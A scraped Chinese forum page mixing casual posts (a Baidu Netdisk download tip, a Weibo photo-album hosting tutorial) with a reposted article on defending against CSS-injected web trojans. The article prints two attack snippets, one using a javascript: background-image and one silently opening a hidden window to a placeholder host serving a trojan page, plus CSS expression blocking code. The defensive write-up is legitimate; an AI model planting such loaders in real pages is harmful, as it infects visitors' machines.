大家都造,在百度网盘如果下载太大的文件的话会提示安装百度云管家哒(。>0<。)
那么问题来了如果懒得装百度云管家,只想使用自己的下载工具(如迅雷、IDM等)怎么办呢(ว ˙0˙)ง
其实只要手动换成wap端的网址就好啦,不过缺点就是需要先转存到你自己的网盘里才行(╬ ̄皿 ̄)凸
嘛。。先买个萌,留点悬念,下一发继续(`・v・´)ゞ
本帖最后由 lalalilu 于 2015-3-23 23:22 编辑
天哪版主大人居然还给发了糖QAQ跪谢!【好神奇!
米娜桑好。。。@76#
因为蠢楼主也不造有木有人发过类似的。。。
所以如果重复了。。。请版主大人帮忙删除 m(_ _)m 谢谢!
不知道大家在用点点贴图的时候有没有遇到过什么问题啊。。。
反正楼主的点点一点也不稳定。。。上传半天还他喵的经常是失败的。。。
没办法楼主就只能另想办法 然后!微相册就突然闯进了楼主的眼帘(๑ŐдŐ)b!
【这里附上链接http://photo.weibo.com】
其实就是微博的相册啦。。。
←←就是这个页面喽
楼主本来也就是试试。。。
结果发现很好用的说!
就算上传后立刻删掉了图也完~全~不会裂的说!
反正楼主的图全部是用微相册上传然后删掉了的说@1#顺便附上
坑~爹~的小白步骤教程【喂(๑`O′)๑1)点开专辑右侧的创建选项
2)新建为宅基专用的图片专辑 可设置为【仅自己】可见
3)建好之后就可以在这个专辑里上传图片啦!
←←点页面右侧的【上传照片】选项上传图片#a3f
4)对了上传图片的时候还是可以旋转的 对于相机手机拍的照片来说很方便有木有?@82#
←←这个是瞎选的网图@107#
4)之后就是复制图片链接。。。然后相册里的图想删就删反正图也不会裂_(:зゝ∠)_。。。。
←←想删就删的说~
完了~
哈哈哈求勿喷哟2333
lalalilu 发表于 2015-3-26 00:00你是说你自己吗2333
本来我也是有cp的。。。可惜人妹子现实中也有汉子追完全就不能好好玩耍啊 ...
欧#33t纵横#43t百合#20t
[查看全文]
本帖最后由 lalalilu 于 2015-3-31 11:38 编辑
最新发现!最近宅基不是一直有bug吗 但是微相册上传图片不会受影响哦~~~
米娜桑们还不酷爱来试一试~【pia飞
[查看全文]
本帖最后由 lalalilu 于 2015-3-27 18:08 编辑
卷福 发表于 2015-3-27 15:25昨天我上不了社区是又傲娇了一晚么!!
话说宅基问题还没有结束啊。。。我现在好多帖子都打不开,,,,
然后下面这一帖我想置顶也置不了啦!
心好累 懒得去提问题了- -
[查看全文]
明镜若止水 发表于 2012-7-10 02:14http://www.duote.com/soft/3443.html 少年 看清楚说明噢
...........不会用QAQ
[查看全文]
本帖最后由 软软的上嘴唇 于 2012-6-24 04:13 编辑
防止CSS样式被挂网页木马
随着CSS网页布局应用的越来越广泛,Web标准逐渐普及,也创造了一个可乘之机。今天dushuwu.net和大家讨论,预防CSS样式被挂网页木马。他们 发现,用来实现页面的CSS,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范IFRAME挂马的CSS代码演变而来。
网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog、Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代黑客的最爱。有许多非常著名的网站都被黑客用CSS挂马入侵过。
在我印象中,记忆最深刻的一次是百度空间CSS挂马。
由于网址是百度空间的网址,许多用户认为不会存在安全问题,加上又有可能是自己朋友发来的,因此会毫不犹豫地点击进入。但是进入指定的网址后,用户就会感染蠕虫病毒,并继续传播。
由于蠕虫扩散非常严重,最终导致百度空间不得不发布官方声明提醒用户,并且大费周折地在服务器中清除蠕虫的恶意代码。那一次的挂马事件利用的就是百度空 间CSS模板功能,通过变形的expression在CSS代码中动态执行脚本,让指定的远程恶意代码文件在后台悄悄运行并发送大量伪造信息。
我建议大家在点击陌生链接时,要多个心眼,大网站也是可能被挂马的。大家在上网时,最好还是使用一些带网页木马拦截功能的安全辅助工具。
为什么选择CSS挂马?
在Web1.0时代,使用IFRAME挂马对于黑客而言,与其说是为了更好地实现木马的隐藏,倒不如说是无可奈何的一个选择。在简单的HTML网页和缺 乏交互性的网站中,黑客可以利用的手段也非常有限,即使采取了复杂的伪装,也很容易被识破,还不如IFRAME来得直接和有效。
但如今交互式的Web2.0网站越来越多,允许用户设置与修改的博客、SNS社区等纷纷出现。这些互动性非常强的社区和博客中,往往会提供丰富的功能,并且会允许用户使用CSS层叠样式表来对网站的网页进行自由的修改,这促使了CSS挂马流行。
小百科:CSS是层叠样式表(Cascading Style Sheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。这个分隔可以让文件的可读性得到加强、文件的结构更加灵活。
在利用CSS挂马时,往往是借着网民对某些大网站的信任,将CSS恶意代码挂到博客或者其他支持CSS的网页中,当网民在访问该网页时恶意代码就会执 行。这就如同你去一家知名且证照齐全的大医院看病,你非常信任医院,但是你所看的门诊却已经被庸医外包了下来,并且打着医院的名义利用你的信任成功欺骗了 你。但是当你事后去找人算账时,医院此时也往往一脸无辜。对于安全工程师而言,CSS挂马的排查是必备常识。
CSS挂马攻防实录攻CSS挂马方式较多,但主流的方式是通过有漏洞的博客或者SNS社交网站系统,将恶意的CSS代码写入支持CSS功能的个性化页面中。下面我们以典型的CSS挂马方式为例进行讲解。
方式1:
Body{
background-image: url('JavaScript:document.write("")')
}
“background-image”在CSS中的主要功能是用来定义页面的背景图片。这是最典型的CSS挂马方式,这段恶意代码主要是通过“background-image”配合JavaScript代码让网页木马悄悄地在用户的电脑中运行。
那如何将这段CSS恶意代码挂到正常的网页中去呢?黑客可以将生成好的网页木马放到自己指定的位置,然后将该段恶意代码写入挂马网站的网页中,或者挂马网页所调用的CSS文件中。
小百科:使用Body对象元素,主要是为了让对象不再改变整个网页文档的内容,通过Body对象的控制,可以将内容或者效果控制在指定的大小内,如同使用DIV对象那样精确地设置大小。
方式2:
Body{
background-image: url(JavaScript:open(' http://www.X.com /muma.htm ','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
方式1的CSS挂马技术,在运行时会出现空白的页面,影响网页访问者正常的访问,因此比较容易发现。不过在方式2中的这段代码,使用了 JavaScript的Open开窗,通过新开一个隐藏的窗口,在后台悄悄地运行新窗口并激活访问网页溢出木马页面,不会影响访问者观看网页内容,因此更 加隐蔽。
防网络服务器被挂马,通常会出现防病毒软件告警之类的信息。由于漏洞不断更新,挂马种类时刻都在变换,通过客户端的反映来发现服务器是否被挂马往往疏漏较大。正确的做法是经常检查服务器日志,发现异常信息,经常检查网站代码,使用网页木马检测系统,进行排查。
目前除了使用以前的阻断弹出窗口防范CSS挂马之外,还可以在网页中设置CSS过滤,将CSS过滤掉。不过如果你选择过滤CSS的话,首先需要留意自己的相关网页是否有CSS的内容,因此我们仍然首推用阻断方式来防范CSS。阻断代码如下所示:
iframe{miao1:expression(this.src='about:blank',this.outerHTML='');}
script{miao2:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}
将外域的木马代码的src重写成本地IE404错误页面的地址,这样,外域的JavaScript 代码不会被下载。不过阻断方式也有天生致命的弱点。